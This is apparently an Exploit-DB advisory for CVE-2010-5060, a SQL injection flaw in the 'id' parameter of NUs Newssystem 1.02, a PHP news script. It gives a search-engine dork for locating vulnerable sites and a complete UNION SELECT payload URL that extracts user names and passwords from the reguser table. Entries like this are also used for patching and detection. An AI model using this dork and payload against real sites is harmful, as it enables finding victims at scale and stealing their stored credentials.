nus newssystem 1.02 - id SQL Injection Vulnerability

2010-03-09T00:00:00
ID EDB-ID:11674
Type exploitdb
Reporter n3w7u
Modified 2010-03-09T00:00:00

Description

NUs Newssystem v1.02 (id) SQL Injection Vulnerability. CVE-2010-5060. Webapps exploit for php platform

                                        
                                            .-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
 
 ~ NUs Newssystem 1.02 (id) SQL Injection Vulnerability ~
 
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.

[+] Autor: n3w7u

[+] Page: http://www.internet-works.de/home.html

[+] Vulnerabilities [ SQL Injection ]

[+] Language: [ PHP ]

[+] Version: 1.02

[+] Dork : inurl:"?pageNum_RSnews"&view

.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability 

    Nus.php?pageNum_RSnews=0&id=
	

[+] Exploitable 

    http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser--